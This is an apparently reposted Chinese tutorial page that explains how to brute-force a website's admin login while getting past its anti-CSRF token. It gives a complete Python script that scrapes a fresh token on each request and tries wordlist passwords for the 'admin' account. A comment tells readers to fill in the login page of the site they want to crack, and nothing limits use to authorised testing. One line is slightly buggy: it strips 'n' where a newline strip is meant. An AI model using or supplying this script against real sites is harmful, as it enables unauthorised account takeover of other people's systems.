栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

**用python编写脚本对有token防御的网站后台穷举密码*

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

**用python编写脚本对有token防御的网站后台穷举密码*

原理:

1、首先获取session值

2、token值会写到服务器的文件中,且每次刷新一下,token值都会发生一次改变,文件中的token值也会发生改变

3、然后再提交账号和密码进行测试


python脚本:


import requests
import re

url = "···················"#填写你需要破解网站的登录页面,并确保你能访问和ping通

def login(password):
    session = requests.session()
    req=session.get(url)
    user_token=re.search("[a-z0-9]{32}",req.text).group(0) #32md5
    data={"username":"admin","password":password,"Login":"Login",'user_token':user_token}
    req=session.post(url=url,data=data,allow_redirects=True)
    html = req.text
    return html

with open('渗透测试弱密码.txt') as p:#密码本文件需要和python脚本在同一个文件夹中
    passlist =p.readlines()
    p.close()

for line in passlist:
    line = line.strip("n")
    print(line)
    if 'File Upload' in login(line):
        print( "[* 密码 is %s *]" % line )
        break


常用密码:可在网站下载常用密码

密码本下载地址,可选择需要的下载
 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/870894.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号